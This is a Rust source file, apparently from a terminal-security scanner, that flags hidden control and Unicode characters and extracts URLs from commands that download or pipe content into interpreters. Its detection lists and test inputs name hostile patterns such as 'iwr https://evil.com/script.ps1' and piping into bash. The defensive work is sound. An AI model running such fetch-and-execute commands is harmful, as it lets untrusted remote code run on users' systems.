1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
/// Origin of the text being scanned; selects which tier-1 pattern set applies.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
    /// A command line about to be executed.
    Exec,
    /// Text pasted into the terminal.
    Paste,
    /// File contents; tier-1 prefiltering always passes (see `tier1_scan`).
    FileScan,
}
18
// Patterns and extractor metadata produced by the build script into OUT_DIR.
// `dead_code` is allowed because not every generated item is used here.
#[allow(dead_code)]
mod tier1_generated {
    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
}
24
/// Returns the IDs of the generated tier-1 extractors (for introspection).
pub fn extractor_ids() -> &'static [&'static str] {
    tier1_generated::EXTRACTOR_IDS
}
29
// Compiled lazily from the build-generated exec pattern. A panic here means
// the build script emitted an invalid regex — a build bug, not runtime input.
static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
});
34
// Compiled lazily from the build-generated paste pattern (a superset of the
// exec fragments, per the boundary test in this file's test module).
static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
});
39
// Matches explicit scheme URLs (http/https/ftp/ssh/git) and scp-style
// `user@host:path` remotes. Whitespace, quotes, and angle brackets end a match.
static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(
        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
    )
    .expect("url regex must compile")
});
47
/// Aggregate result of `scan_bytes`: one flag per hazard class, plus a
/// `ByteFinding` entry in `details` for each individual occurrence.
pub struct ByteScanResult {
    /// CSI/OSC/APC/DCS escape sequences, or a trailing bare ESC byte.
    pub has_ansi_escapes: bool,
    /// C0 control bytes (except \n, \t, ESC, and line-ending \r) or DEL.
    pub has_control_chars: bool,
    /// Bidirectional text control characters (LRM/RLM, overrides, isolates).
    pub has_bidi_controls: bool,
    /// Zero-width characters (ZWSP, ZWNJ, ZWJ, non-leading BOM, etc.).
    pub has_zero_width: bool,
    /// Input is not valid UTF-8 as a whole.
    pub has_invalid_utf8: bool,
    /// Deprecated Unicode tag characters (U+E0000..U+E007F).
    pub has_unicode_tags: bool,
    /// Variation selectors (U+FE00..U+FE0F, U+E0100..U+E01EF).
    pub has_variation_selectors: bool,
    /// Invisible math operators (U+2061..U+2064).
    pub has_invisible_math_operators: bool,
    /// Thin/hair/narrow no-break spaces easily mistaken for regular spaces.
    pub has_invisible_whitespace: bool,
    /// One entry per individual finding, with offsets and descriptions.
    pub details: Vec<ByteFinding>,
}
61
/// One suspicious byte or codepoint located by `scan_bytes`.
///
/// Derives `Debug`/`Clone` for parity with `ExtractedUrl` so findings can be
/// logged and passed around by value.
#[derive(Debug, Clone)]
pub struct ByteFinding {
    /// Byte offset of the finding within the scanned input.
    pub offset: usize,
    /// The byte at `offset` (the lead byte for multibyte codepoints).
    pub byte: u8,
    /// Decoded codepoint, when the finding is a Unicode character.
    pub codepoint: Option<u32>,
    /// Human-readable description of the hazard.
    pub description: String,
}
69
70pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
72 match context {
73 ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
74 ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
75 ScanContext::FileScan => true,
77 }
78}
79
80pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
82 let mut result = ByteScanResult {
83 has_ansi_escapes: false,
84 has_control_chars: false,
85 has_bidi_controls: false,
86 has_zero_width: false,
87 has_invalid_utf8: false,
88 has_unicode_tags: false,
89 has_variation_selectors: false,
90 has_invisible_math_operators: false,
91 has_invisible_whitespace: false,
92 details: Vec::new(),
93 };
94
95 if std::str::from_utf8(input).is_err() {
97 result.has_invalid_utf8 = true;
98 }
99
100 let len = input.len();
101 let mut i = 0;
102 while i < len {
103 let b = input[i];
104
105 if b == 0x1b {
107 if i + 1 < len {
108 let next = input[i + 1];
109 if next == b'[' || next == b']' || next == b'_' || next == b'P' {
110 result.has_ansi_escapes = true;
111 result.details.push(ByteFinding {
112 offset: i,
113 byte: b,
114 codepoint: None,
115 description: match next {
116 b'[' => "CSI escape sequence",
117 b']' => "OSC escape sequence",
118 b'_' => "APC escape sequence",
119 b'P' => "DCS escape sequence",
120 _ => "escape sequence",
121 }
122 .to_string(),
123 });
124 i += 2;
125 continue;
126 }
127 } else {
128 result.has_ansi_escapes = true;
130 result.details.push(ByteFinding {
131 offset: i,
132 byte: b,
133 codepoint: None,
134 description: "trailing escape byte".to_string(),
135 });
136 }
137 }
138
139 if b == b'\r' {
143 let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
144 if is_attack_cr {
145 result.has_control_chars = true;
146 result.details.push(ByteFinding {
147 offset: i,
148 byte: b,
149 codepoint: None,
150 description: format!("control character 0x{b:02x}"),
151 });
152 }
153 } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
154 result.has_control_chars = true;
155 result.details.push(ByteFinding {
156 offset: i,
157 byte: b,
158 codepoint: None,
159 description: format!("control character 0x{b:02x}"),
160 });
161 }
162
163 if b == 0x7F {
165 result.has_control_chars = true;
166 result.details.push(ByteFinding {
167 offset: i,
168 byte: b,
169 codepoint: None,
170 description: "control character 0x7f (DEL)".to_string(),
171 });
172 }
173
174 if b >= 0xc0 {
176 let remaining = &input[i..];
178 if let Some(ch) = std::str::from_utf8(remaining)
179 .ok()
180 .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
181 .and_then(|s| s.chars().next())
182 {
183 if is_bidi_control(ch) {
185 result.has_bidi_controls = true;
186 result.details.push(ByteFinding {
187 offset: i,
188 byte: b,
189 codepoint: Some(ch as u32),
190 description: format!("bidi control U+{:04X}", ch as u32),
191 });
192 }
193 if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
196 result.has_zero_width = true;
197 result.details.push(ByteFinding {
198 offset: i,
199 byte: b,
200 codepoint: Some(ch as u32),
201 description: format!("zero-width character U+{:04X}", ch as u32),
202 });
203 }
204 if is_unicode_tag(ch) {
206 result.has_unicode_tags = true;
207 result.details.push(ByteFinding {
208 offset: i,
209 byte: b,
210 codepoint: Some(ch as u32),
211 description: format!("unicode tag U+{:04X}", ch as u32),
212 });
213 }
214 if is_variation_selector(ch) {
216 result.has_variation_selectors = true;
217 result.details.push(ByteFinding {
218 offset: i,
219 byte: b,
220 codepoint: Some(ch as u32),
221 description: format!("variation selector U+{:04X}", ch as u32),
222 });
223 }
224 if is_invisible_math_operator(ch) {
226 result.has_invisible_math_operators = true;
227 result.details.push(ByteFinding {
228 offset: i,
229 byte: b,
230 codepoint: Some(ch as u32),
231 description: format!("invisible math operator U+{:04X}", ch as u32),
232 });
233 }
234 if is_invisible_whitespace(ch) {
236 result.has_invisible_whitespace = true;
237 result.details.push(ByteFinding {
238 offset: i,
239 byte: b,
240 codepoint: Some(ch as u32),
241 description: format!("invisible whitespace U+{:04X}", ch as u32),
242 });
243 }
244 i += ch.len_utf8();
245 continue;
246 }
247 }
248
249 i += 1;
250 }
251
252 result
253}
254
/// True for bidirectional text controls: LRM/RLM, the embedding/override
/// block U+202A..U+202E, and the isolate block U+2066..U+2069.
fn is_bidi_control(ch: char) -> bool {
    matches!(ch, '\u{200E}' | '\u{200F}')
        || ('\u{202A}'..='\u{202E}').contains(&ch)
        || ('\u{2066}'..='\u{2069}').contains(&ch)
}
272
/// True for zero-width characters: ZWSP, ZWNJ, ZWJ, ZWNBSP/BOM, combining
/// grapheme joiner, soft hyphen, and word joiner.
fn is_zero_width(ch: char) -> bool {
    const ZERO_WIDTH: &[char] = &[
        '\u{200B}', '\u{200C}', '\u{200D}', '\u{FEFF}', '\u{034F}', '\u{00AD}', '\u{2060}',
    ];
    ZERO_WIDTH.contains(&ch)
}
286
/// True for the deprecated tag characters U+E0000..U+E007F, which can encode
/// an invisible ASCII payload.
fn is_unicode_tag(ch: char) -> bool {
    matches!(ch, '\u{E0000}'..='\u{E007F}')
}
291
/// True for variation selectors: VS1-VS16 (U+FE00..U+FE0F) and the
/// supplementary VS17-VS256 (U+E0100..U+E01EF).
fn is_variation_selector(ch: char) -> bool {
    matches!(ch, '\u{FE00}'..='\u{FE0F}' | '\u{E0100}'..='\u{E01EF}')
}
299
/// True for the invisible math operators U+2061 FUNCTION APPLICATION through
/// U+2064 INVISIBLE PLUS.
fn is_invisible_math_operator(ch: char) -> bool {
    matches!(ch, '\u{2061}'..='\u{2064}')
}
305
/// True for thin space, hair space, and narrow no-break space — whitespace
/// easily mistaken for an ordinary space in terminal output.
fn is_invisible_whitespace(ch: char) -> bool {
    matches!(ch, '\u{2009}' | '\u{200A}' | '\u{202F}')
}
315
/// Tokenizes `input` for `shell` and extracts every URL-like value, tagging
/// each with its pipeline segment index and whether it feeds a
/// download/execution sink.
///
/// Per segment, the sources considered are: the command word and arguments,
/// leading `VAR=value` assignments (proxy variables excluded), schemeless
/// `host.tld/path` arguments of sink commands, and docker/podman/nerdctl
/// image references (including `build -t` tags).
pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
    let segments = tokenize::tokenize(input, shell);
    let mut results = Vec::new();

    for (seg_idx, segment) in segments.iter().enumerate() {
        let sink_context = is_sink_context(segment, &segments);
        let resolved = resolve_segment_command(segment);

        // Collect the raw command word and arguments for explicit-URL scans.
        let mut url_sources: Vec<&str> = Vec::new();
        if let Some(ref cmd) = segment.command {
            url_sources.push(cmd.as_str());
        }
        for arg in &segment.args {
            url_sources.push(arg.as_str());
        }
        // Leading VAR=value assignments may smuggle a URL; proxy variables
        // only configure infrastructure and are skipped.
        for (name, value) in tokenize::leading_env_assignments(&segment.raw) {
            if ignores_env_assignment_url(&name) {
                continue;
            }
            let clean = strip_quotes(&value);
            if !clean.is_empty() {
                push_urls_from_source(&clean, seg_idx, sink_context, &mut results);
            }
        }
        for source in &url_sources {
            push_urls_from_source(source, seg_idx, sink_context, &mut results);
        }

        // For sink commands (docker-family handled separately below), also
        // treat schemeless `host.tld/path` arguments as URLs.
        let is_docker_cmd = resolved
            .as_ref()
            .is_some_and(|cmd| matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl"));
        if sink_context && !is_docker_cmd {
            if let Some(cmd) = resolved.as_ref() {
                for (arg_idx, arg) in cmd.args.iter().enumerate() {
                    // Skip values of output/credential flags (e.g. `-o file`).
                    if is_output_flag_value(&cmd.name, cmd.args, arg_idx) {
                        continue;
                    }
                    let clean = strip_quotes(arg);
                    // `user@host` scp/rsync endpoints are not URLs here.
                    if is_remote_copy_target(&cmd.name, &clean) {
                        continue;
                    }
                    if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
                        results.push(ExtractedUrl {
                            raw: clean.clone(),
                            parsed: UrlLike::SchemelessHostPath {
                                host: extract_host_from_schemeless(&clean),
                                path: extract_path_from_schemeless(&clean),
                            },
                            segment_index: seg_idx,
                            in_sink_context: true,
                        });
                    }
                }
            }
        }

        // Container commands: image references implicitly name a registry.
        if let Some(cmd) = resolved.as_ref() {
            if matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl") {
                if let Some(docker_subcmd) = cmd.args.first() {
                    let subcmd_lower = docker_subcmd.to_lowercase();
                    if subcmd_lower == "build" {
                        // Tag forms: `-t name`, `-tname`, `--tag name`,
                        // `--tag=name`.
                        let mut i = 1;
                        while i < cmd.args.len() {
                            let arg = strip_quotes(&cmd.args[i]);
                            if (arg == "-t" || arg == "--tag") && i + 1 < cmd.args.len() {
                                let tag_val = strip_quotes(&cmd.args[i + 1]);
                                if !tag_val.is_empty() {
                                    let docker_url = parse::parse_docker_ref(&tag_val);
                                    results.push(ExtractedUrl {
                                        raw: tag_val,
                                        parsed: docker_url,
                                        segment_index: seg_idx,
                                        in_sink_context: true,
                                    });
                                }
                                i += 2;
                            } else if arg.starts_with("-t") && arg.len() > 2 {
                                let tag_val = strip_quotes(&arg[2..]);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else if let Some(val) = arg.strip_prefix("--tag=") {
                                let tag_val = strip_quotes(val);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else {
                                i += 1;
                            }
                        }
                    } else if subcmd_lower == "image" {
                        // `docker image pull|push|inspect|rm|tag <image>`.
                        if let Some(image_subcmd) = cmd.args.get(1) {
                            let image_subcmd_lower = image_subcmd.to_lowercase();
                            if matches!(
                                image_subcmd_lower.as_str(),
                                "pull" | "push" | "inspect" | "rm" | "tag"
                            ) {
                                extract_first_docker_image(&cmd.args[2..], seg_idx, &mut results);
                            }
                        }
                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
                        extract_first_docker_image(&cmd.args[1..], seg_idx, &mut results);
                    }
                }
            }
        }
    }

    results
}
448
/// A URL-like value found in a command line.
#[derive(Debug, Clone)]
pub struct ExtractedUrl {
    /// The matched text as extracted (quotes already stripped where relevant).
    pub raw: String,
    /// Structured interpretation of `raw`.
    pub parsed: UrlLike,
    /// Index of the pipeline segment the value was found in.
    pub segment_index: usize,
    /// True when the segment feeds a download/execution sink.
    pub in_sink_context: bool,
}
457
// docker/podman/nerdctl options whose value is a separate following argument;
// that value must not be mistaken for the image reference.
const DOCKER_VALUE_FLAGS: &[&str] = &[
    "--platform",
    "--format",
    "--filter",
    "-f",
    "--label",
    "-l",
    "--name",
    "--hostname",
    "--user",
    "-u",
    "--workdir",
    "-w",
    "--network",
    "--net",
    "--env",
    "-e",
    "--env-file",
    "--publish",
    "-p",
    "--expose",
    "--volume",
    "-v",
    "--mount",
    "--add-host",
    "--device",
    "--entrypoint",
    "--log-driver",
    "--log-opt",
    "--restart",
    "--runtime",
    "--cpus",
    "--cpu-shares",
    "--cpu-quota",
    "--memory",
    "--memory-reservation",
    "--memory-swap",
    "--shm-size",
    "--ulimit",
    "--security-opt",
    "--sysctl",
    "--tmpfs",
    "--gpus",
    "--ipc",
    "--pid",
    "--userns",
    "--cgroupns",
];
507
// Short options that may carry their value attached (e.g. `-p8080:80`).
const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
510
511fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
513 let mut skip_next = false;
514 let mut end_of_options = false;
515 for arg in args {
516 if skip_next {
517 skip_next = false;
518 continue;
519 }
520 let clean = strip_quotes(arg);
521 if clean == "--" {
522 end_of_options = true;
523 continue;
524 }
525 if !end_of_options && clean.starts_with("--") && clean.contains('=') {
526 continue; }
528 if !end_of_options && clean.starts_with('-') {
529 if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
530 skip_next = true;
531 }
532 if DOCKER_VALUE_PREFIXES
533 .iter()
534 .any(|p| clean.starts_with(p) && clean.len() > p.len())
535 {
536 continue;
537 }
538 continue;
539 }
540 if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
541 let docker_url = parse::parse_docker_ref(&clean);
542 results.push(ExtractedUrl {
543 raw: clean,
544 parsed: docker_url,
545 segment_index: seg_idx,
546 in_sink_context: true,
547 });
548 }
549 break; }
551}
552
/// A command after unwrapping shell wrappers (`env`, `command`, `time`,
/// `tirith`): the lowercased base name plus the arguments that apply to it,
/// borrowed from the owning segment.
#[derive(Debug, Clone)]
struct ResolvedCommand<'a> {
    name: String,
    args: &'a [String],
}
558
559fn push_urls_from_source(
560 source: &str,
561 segment_index: usize,
562 in_sink_context: bool,
563 results: &mut Vec<ExtractedUrl>,
564) {
565 for mat in URL_REGEX.find_iter(source) {
566 let raw = mat.as_str().to_string();
567 let url = parse::parse_url(&raw);
568 results.push(ExtractedUrl {
569 raw,
570 parsed: url,
571 segment_index,
572 in_sink_context,
573 });
574 }
575}
576
/// True for proxy-configuration variables (`HTTP_PROXY`, `NO_PROXY`, ...)
/// whose URL names infrastructure rather than a fetch destination.
fn ignores_env_assignment_url(name: &str) -> bool {
    let upper = name.to_ascii_uppercase();
    upper.ends_with("_PROXY") || upper == "NO_PROXY"
}
581
/// True for `env` long options that take a value; the `--flag=value` spelling
/// is normalized to the flag name before comparison.
fn env_long_flag_takes_value(flag: &str) -> bool {
    let name = flag.split('=').next().unwrap_or(flag);
    matches!(name, "--unset" | "--chdir" | "--split-string")
}
586
587fn command_base_name(raw: &str) -> String {
588 let clean = strip_quotes(raw);
589 clean
590 .rsplit(['/', '\\'])
591 .next()
592 .unwrap_or(clean.as_str())
593 .to_lowercase()
594}
595
596fn resolve_segment_command(segment: &Segment) -> Option<ResolvedCommand<'_>> {
597 let command = segment.command.as_ref()?;
598 resolve_named_command(command, &segment.args)
599}
600
/// Maps a command token to the effective command, recursively unwrapping the
/// known wrappers (`env`, `command`, `time`, `tirith`).
fn resolve_named_command<'a>(command: &str, args: &'a [String]) -> Option<ResolvedCommand<'a>> {
    let name = command_base_name(command);
    match name.as_str() {
        "env" => resolve_env_command(args),
        "command" => resolve_command_wrapper(args),
        "time" => resolve_time_wrapper(args),
        "tirith" => resolve_tirith_command(args),
        _ => Some(ResolvedCommand { name, args }),
    }
}
611
/// Resolves the real command behind an `env` wrapper.
///
/// Skips leading `VAR=value` assignments and `env`'s own options; options
/// taking a separate value (`-u`, `-C`, `-S`, and the long forms recognized
/// by `env_long_flag_takes_value`) also consume the next argument. After
/// `--`, only assignments may still precede the command. Returns `None`
/// when no command follows.
fn resolve_env_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
    let mut i = 0;
    while i < args.len() {
        let clean = strip_quotes(&args[i]);
        if clean == "--" {
            i += 1;
            break;
        }
        if tokenize::is_env_assignment(&clean) {
            i += 1;
            continue;
        }
        if clean.starts_with('-') {
            if clean.starts_with("--") {
                // `--unset NAME` consumes a value; `--unset=NAME` does not.
                if env_long_flag_takes_value(&clean) && !clean.contains('=') {
                    i += 2;
                } else {
                    i += 1;
                }
                continue;
            }
            // Short options that take a separate value argument.
            if clean == "-u" || clean == "-C" || clean == "-S" {
                i += 2;
                continue;
            }
            i += 1;
            continue;
        }
        // First non-option, non-assignment token is the wrapped command.
        return resolve_named_command(&clean, &args[i + 1..]);
    }

    // Past `--`: assignments may still precede the command.
    while i < args.len() {
        let clean = strip_quotes(&args[i]);
        if tokenize::is_env_assignment(&clean) {
            i += 1;
            continue;
        }
        return resolve_named_command(&clean, &args[i + 1..]);
    }

    None
}
654
655fn resolve_command_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
656 let mut i = 0;
657 while i < args.len() {
658 let clean = strip_quotes(&args[i]);
659 if clean == "--" {
660 i += 1;
661 break;
662 }
663 if clean.starts_with('-') {
664 i += 1;
665 continue;
666 }
667 break;
668 }
669 args.get(i)
670 .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
671}
672
673fn resolve_time_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
674 let mut i = 0;
675 while i < args.len() {
676 let clean = strip_quotes(&args[i]);
677 if clean == "--" {
678 i += 1;
679 break;
680 }
681 if clean.starts_with('-') {
682 if clean == "-f" || clean == "--format" || clean == "-o" || clean == "--output" {
683 i += 2;
684 } else {
685 i += 1;
686 }
687 continue;
688 }
689 break;
690 }
691 args.get(i)
692 .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
693}
694
695fn resolve_tirith_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
696 let subcommand = args.first().map(|arg| command_base_name(arg))?;
697 match subcommand.as_str() {
698 "run" => Some(ResolvedCommand {
699 name: "tirith-run".to_string(),
700 args: &args[1..],
701 }),
702 _ => Some(ResolvedCommand {
703 name: "tirith".to_string(),
704 args,
705 }),
706 }
707}
708
709fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
711 if let Some(cmd) = resolve_segment_command(segment) {
712 let cmd_lower = cmd.name;
713 if cmd_lower == "git" {
715 return is_git_sink(cmd.args);
716 }
717 if is_source_command(&cmd_lower) {
718 return true;
719 }
720 }
721
722 if let Some(sep) = &segment.preceding_separator {
724 if sep == "|" || sep == "|&" {
725 if let Some(cmd) = resolve_segment_command(segment) {
727 if is_interpreter(&cmd.name) {
728 return true;
729 }
730 }
731 }
732 }
733
734 false
735}
736
/// True for commands that fetch remote content (downloaders, package
/// managers, container runtimes, PowerShell web cmdlets, `tirith run`).
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        "curl",
        "wget",
        "http",
        "https",
        "xh",
        "fetch",
        "scp",
        "rsync",
        "docker",
        "podman",
        "nerdctl",
        "pip",
        "pip3",
        "npm",
        "npx",
        "yarn",
        "pnpm",
        "go",
        "cargo",
        "iwr",
        "irm",
        "invoke-webrequest",
        "invoke-restmethod",
        "tirith-run",
    ];
    SOURCE_COMMANDS.contains(&cmd)
}
766
/// For `scp`/`rsync` only: true when `arg` is a bare `user@host` endpoint
/// (no colon before the `@`, and no path or port-like suffix after it).
fn is_remote_copy_target(cmd: &str, arg: &str) -> bool {
    if cmd != "scp" && cmd != "rsync" {
        return false;
    }
    match arg.split_once('@') {
        Some((user, host)) => !user.contains(':') && !host.contains('/') && !host.contains(':'),
        None => false,
    }
}
780
781fn is_git_sink(args: &[String]) -> bool {
784 if args.is_empty() {
785 return false;
786 }
787 for arg in args {
789 let clean = strip_quotes(arg);
790 if clean.starts_with('-') {
791 continue;
792 }
793 return matches!(
794 clean.as_str(),
795 "clone" | "fetch" | "pull" | "submodule" | "remote"
796 );
797 }
798 false
799}
800
/// True for commands that execute piped input as code (shells, scripting
/// language interpreters, PowerShell's `iex`).
fn is_interpreter(cmd: &str) -> bool {
    const INTERPRETERS: &[&str] = &[
        "sh",
        "bash",
        "zsh",
        "dash",
        "ksh",
        "python",
        "python3",
        "node",
        "perl",
        "ruby",
        "php",
        "iex",
        "invoke-expression",
    ];
    INTERPRETERS.contains(&cmd)
}
818
819fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
823 let cmd_lower = cmd.to_lowercase();
824 let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
825
826 match cmd_base {
827 "curl" => {
828 if arg_index > 0 {
829 let prev = strip_quotes(&args[arg_index - 1]);
830 if prev == "-o"
831 || prev == "--output"
832 || prev == "-u"
833 || prev == "--user"
834 || prev == "-U"
835 || prev == "--proxy-user"
836 {
837 return true;
838 }
839 }
840 let current = strip_quotes(&args[arg_index]);
841 if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
842 return true;
843 }
844 if current.starts_with("--output=")
845 || current.starts_with("--user=")
846 || current.starts_with("--proxy-user=")
847 {
848 return true;
849 }
850 false
851 }
852 "wget" => {
853 if arg_index > 0 {
854 let prev = strip_quotes(&args[arg_index - 1]);
855 if prev == "-O"
856 || prev == "--output-document"
857 || prev == "--user"
858 || prev == "--password"
859 || prev == "--http-user"
860 || prev == "--http-password"
861 || prev == "--ftp-user"
862 || prev == "--ftp-password"
863 || prev == "--proxy-user"
864 || prev == "--proxy-password"
865 {
866 return true;
867 }
868 }
869 let current = strip_quotes(&args[arg_index]);
870 if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
871 return true;
872 }
873 if current.starts_with("--output-document=")
874 || current.starts_with("--user=")
875 || current.starts_with("--password=")
876 || current.starts_with("--http-user=")
877 || current.starts_with("--http-password=")
878 || current.starts_with("--ftp-user=")
879 || current.starts_with("--ftp-password=")
880 || current.starts_with("--proxy-user=")
881 || current.starts_with("--proxy-password=")
882 {
883 return true;
884 }
885 false
886 }
887 "http" | "https" | "xh" => {
888 if arg_index > 0 {
889 let prev = strip_quotes(&args[arg_index - 1]);
890 if prev == "-a" || prev == "--auth" {
891 return true;
892 }
893 }
894 let current = strip_quotes(&args[arg_index]);
895 if current.starts_with("--auth=") {
896 return true;
897 }
898 false
899 }
900 _ => false,
901 }
902}
903
/// Trims whitespace and removes one matching pair of surrounding quotes
/// (single or double). Mismatched or lone quotes are left untouched.
fn strip_quotes(s: &str) -> String {
    let trimmed = s.trim();
    for quote in ['"', '\''] {
        if let Some(inner) = trimmed
            .strip_prefix(quote)
            .and_then(|rest| rest.strip_suffix(quote))
        {
            return inner.to_string();
        }
    }
    trimmed.to_string()
}
914
/// Heuristic: does `s` look like a schemeless `host.tld[/path]` URL?
///
/// Rejects flag-like tokens, dotfiles, hosts containing spaces, bare
/// filenames ending in a known file extension (unless a real path component
/// follows), and anything whose final label is not a 2-63 letter TLD.
fn looks_like_schemeless_host(s: &str) -> bool {
    if s.starts_with('-') || s.starts_with('.') || !s.contains('.') {
        return false;
    }
    let host = s.split('/').next().unwrap_or(s);
    if !host.contains('.') || host.contains(' ') {
        return false;
    }
    // A non-trivial path after the host is strong URL evidence; without one,
    // a known file extension means this is probably just a filename.
    let meaningful_path = s.find('/').is_some_and(|idx| {
        let rest = &s[idx + 1..];
        !rest.is_empty() && rest != "/"
    });
    if !meaningful_path {
        const FILE_EXTS: &[&str] = &[
            ".sh",
            ".py",
            ".rb",
            ".js",
            ".ts",
            ".go",
            ".rs",
            ".c",
            ".h",
            ".txt",
            ".md",
            ".json",
            ".yaml",
            ".yml",
            ".xml",
            ".html",
            ".css",
            ".tar.gz",
            ".tar.bz2",
            ".tar.xz",
            ".tgz",
            ".zip",
            ".gz",
            ".bz2",
            ".rpm",
            ".deb",
            ".pkg",
            ".dmg",
            ".exe",
            ".msi",
            ".dll",
            ".so",
            ".log",
            ".conf",
            ".cfg",
            ".ini",
            ".toml",
            ".png",
            ".jpg",
            ".jpeg",
            ".gif",
            ".bmp",
            ".ico",
            ".tiff",
            ".tif",
            ".pdf",
            ".csv",
            ".mp3",
            ".mp4",
            ".wav",
            ".avi",
            ".mkv",
            ".flac",
            ".ogg",
            ".webm",
            ".ttf",
            ".otf",
            ".woff",
            ".woff2",
            ".docx",
            ".xlsx",
            ".pptx",
            ".sqlite",
            ".lock",
            ".example",
            ".local",
            ".bak",
            ".tmp",
            ".swp",
            ".orig",
            ".patch",
            ".diff",
            ".map",
            ".env",
            ".sample",
            ".dist",
            ".editorconfig",
        ];
        let host_lower = host.to_lowercase();
        if FILE_EXTS.iter().any(|ext| host_lower.ends_with(ext)) {
            return false;
        }
    }
    // `host` contains at least one '.', so there are always >= 2 labels; the
    // last label must look like an alphabetic TLD.
    let tld = host.rsplit('.').next().unwrap_or("");
    (2..=63).contains(&tld.len()) && tld.chars().all(|c| c.is_ascii_alphabetic())
}
1032
/// Host portion of a schemeless URL: everything before the first `/`.
fn extract_host_from_schemeless(s: &str) -> String {
    match s.split_once('/') {
        Some((host, _)) => host.to_string(),
        None => s.to_string(),
    }
}
1036
/// Path portion of a schemeless URL: the first `/` and everything after it,
/// or the empty string when there is no path.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/')
        .map_or_else(String::new, |idx| s[idx..].to_string())
}
1044
1045#[cfg(test)]
1046mod tests {
1047 use super::*;
1048
1049 #[test]
1050 fn test_tier1_exec_matches_url() {
1051 assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
1052 }
1053
1054 #[test]
1055 fn test_tier1_exec_no_match_simple() {
1056 assert!(!tier1_scan("ls -la", ScanContext::Exec));
1057 }
1058
1059 #[test]
1060 fn test_tier1_exec_no_match_echo() {
1061 assert!(!tier1_scan("echo hello world", ScanContext::Exec));
1062 }
1063
1064 #[test]
1065 fn test_tier1_exec_matches_pipe_bash() {
1066 assert!(tier1_scan("something | bash", ScanContext::Exec));
1067 }
1068
1069 #[test]
1070 fn test_tier1_exec_matches_pipe_sudo_bash() {
1071 assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
1072 }
1073
1074 #[test]
1075 fn test_tier1_exec_matches_pipe_env_bash() {
1076 assert!(tier1_scan("something | env bash", ScanContext::Exec));
1077 }
1078
1079 #[test]
1080 fn test_tier1_exec_matches_pipe_bin_bash() {
1081 assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
1082 }
1083
1084 #[test]
1085 fn test_tier1_exec_matches_git_scp() {
1086 assert!(tier1_scan(
1087 "git clone git@github.com:user/repo",
1088 ScanContext::Exec
1089 ));
1090 }
1091
1092 #[test]
1093 fn test_tier1_exec_matches_punycode() {
1094 assert!(tier1_scan(
1095 "curl https://xn--example-cua.com",
1096 ScanContext::Exec
1097 ));
1098 }
1099
1100 #[test]
1101 fn test_tier1_exec_matches_docker() {
1102 assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
1103 }
1104
1105 #[test]
1106 fn test_tier1_exec_matches_iwr() {
1107 assert!(tier1_scan(
1108 "iwr https://evil.com/script.ps1",
1109 ScanContext::Exec
1110 ));
1111 }
1112
1113 #[test]
1114 fn test_tier1_exec_matches_curl() {
1115 assert!(tier1_scan(
1116 "curl https://example.com/install.sh",
1117 ScanContext::Exec
1118 ));
1119 }
1120
1121 #[test]
1122 fn test_tier1_exec_matches_lookalike_tld() {
1123 assert!(tier1_scan("open file.zip", ScanContext::Exec));
1124 }
1125
1126 #[test]
1127 fn test_tier1_exec_matches_shortener() {
1128 assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
1129 }
1130
1131 #[test]
1132 fn test_tier1_paste_matches_non_ascii() {
1133 assert!(tier1_scan("café", ScanContext::Paste));
